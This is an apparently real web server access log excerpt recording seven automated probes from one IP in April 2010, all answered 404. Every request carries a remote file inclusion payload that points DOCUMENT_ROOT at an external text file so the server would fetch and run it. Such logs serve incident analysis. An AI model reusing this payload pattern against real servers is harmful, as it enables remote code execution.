69.163.227.186 - - [21/Apr/2010:10:56:26 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.163.227.186 - - [21/Apr/2010:10:56:26 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.163.227.186 - - [21/Apr/2010:10:56:26 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.163.227.186 - - [21/Apr/2010:10:56:26 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.163.227.186 - - [21/Apr/2010:10:56:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.163.227.186 - - [21/Apr/2010:10:56:32 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.163.227.186 - - [21/Apr/2010:10:56:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://universalcladding.com/modules/idxx.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
